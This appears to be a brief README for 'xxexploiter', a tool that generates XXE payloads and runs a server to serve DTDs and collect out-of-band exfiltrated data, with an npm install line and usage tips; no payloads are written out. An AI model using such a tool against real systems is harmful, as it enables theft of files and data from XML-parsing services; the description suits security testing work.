xxexploiter: Tool to help exploit XXE vulnerabilities
It generates the XML payloads, and automatically starts a server to serve the needed DTD’s or to do data exfiltration.
If you choose to use OOB or CDATA mode, XXExploiter will generate the necessary dtd to be included and will start a server to host them. Have in mind that if you use these options you should set the server address
If you include content in the body of the XML have in mind that XML restricted characters like ‘<‘ may break the parsing so be sure to use CDATA or PHP’s base64encode
Most of the languages limit the number of entity expansion, or the total length of the content expanded, so make sure you test XEE on your machine first, with the same conditions as the target.
npm install -g xxexploiter
Simple payload Generation
Automating request to send payload
OOB Extraction with automated request
Copyright (c) 2020 Luis Fontes